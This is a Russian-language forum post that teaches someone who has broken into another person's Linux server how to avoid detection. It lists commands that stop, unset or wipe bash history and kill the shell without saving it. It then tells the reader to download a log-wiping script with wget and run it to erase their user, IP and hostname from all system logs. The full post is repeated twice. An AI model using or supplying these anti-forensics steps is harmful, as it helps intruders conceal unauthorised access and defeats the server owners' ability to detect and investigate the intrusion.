shad0w
Пользователь
- Сообщения
- 260
Здесь пойдет речь о сокрытии своего присутствия на чужих серверах OS семейства Linux. Если вам удалось любым образом получить доступ к чужому серверу, важно беспалевно пользоваться доступом.
Команды, с помощью которых можно узнать об удаленных сеансах и подключениях к серверу.
w - unix-утилита, показывающая информацию о работающих в данный момент на машине пользователях и о их процессах. Для каждого пользователя выводятся следующие записи: регистрационное имя, название терминала, удалённая машина, время регистрации в системе, время простоя, JCPU, PCPU и командную строку его текущего процесса.
Если утилита w показывает текущих пользователей в системе, а мы хотим узнать список всех когда-либо подключившихся пользователей, то на этот случай существует утилита "last".
last - unix-утилита, отображающая список последних терминальных сессий с выборкой по пользователю или терминалу. Все события при этом упорядочены по времени.
Существуют утилиты who и lastlog, они похожи на last, поэтому нет смысла рассматривать.
history - история выполнения. История запущенных команд сохраняется в файле ~/.bash_history. Перечислим некоторые способы, чтобы избежать их логирования:
Первый способ - просто набирайте перед каждой командой пробел, тогда команда не попадет ~/.bash_history
Код:
[space][command]
Второй – после подключения к серверу и до ввода своих команд, наберите:
Код:
export HISTFILE=/dev/null
Третий – если вы забыли выполнить второй пункт, то выполните:
Код:
unset HISTFILE
unset SAVEHIST
Тогда все команды введенные в рамках вашей сессии не попадут в ~/.bash_history
Код:
kill -9 $$
закрывает сессию не сохраняя историю команд
Код:
cat /dev/null > ~/.bash_history && history -c
Чистка.
И наконец представляю вашему вниманию скрипт, который выполнит за вас всю грязную работу и сотрет все ваши следы с системы. Для того чтобы им воспользоваться достаточно выполнить следующее:
Код:
wget https://raw.githubusercontent.com/JusticeRage/freedomfighting/master/nojail.py
python nojail.py --user [пользователь от которого вы подключались] --ip [с которого вы подкючались] --hostname [имя хоста с которым вы работали]
и запустить с нужными параметрами, описание которых вы найдете в Readme. После запуска активность удаляется из всех файлов логов.
Команды, с помощью которых можно узнать об удаленных сеансах и подключениях к серверу.
w - unix-утилита, показывающая информацию о работающих в данный момент на машине пользователях и о их процессах. Для каждого пользователя выводятся следующие записи: регистрационное имя, название терминала, удалённая машина, время регистрации в системе, время простоя, JCPU, PCPU и командную строку его текущего процесса.
Если утилита w показывает текущих пользователей в системе, а мы хотим узнать список всех когда-либо подключившихся пользователей, то на этот случай существует утилита "last".
last - unix-утилита, отображающая список последних терминальных сессий с выборкой по пользователю или терминалу. Все события при этом упорядочены по времени.
Существуют утилиты who и lastlog, они похожи на last, поэтому нет смысла рассматривать.
history - история выполнения. История запущенных команд сохраняется в файле ~/.bash_history. Перечислим некоторые способы, чтобы избежать их логирования:
Первый способ - просто набирайте перед каждой командой пробел, тогда команда не попадет ~/.bash_history
Код:
[space][command]
Второй – после подключения к серверу и до ввода своих команд, наберите:
Код:
export HISTFILE=/dev/null
Третий – если вы забыли выполнить второй пункт, то выполните:
Код:
unset HISTFILE
unset SAVEHIST
Тогда все команды введенные в рамках вашей сессии не попадут в ~/.bash_history
Код:
kill -9 $$
закрывает сессию не сохраняя историю команд
Код:
cat /dev/null > ~/.bash_history && history -c
Чистка.
И наконец представляю вашему вниманию скрипт, который выполнит за вас всю грязную работу и сотрет все ваши следы с системы. Для того чтобы им воспользоваться достаточно выполнить следующее:
Код:
wget https://raw.githubusercontent.com/JusticeRage/freedomfighting/master/nojail.py
python nojail.py --user [пользователь от которого вы подключались] --ip [с которого вы подкючались] --hostname [имя хоста с которым вы работали]
и запустить с нужными параметрами, описание которых вы найдете в Readme. После запуска активность удаляется из всех файлов логов.
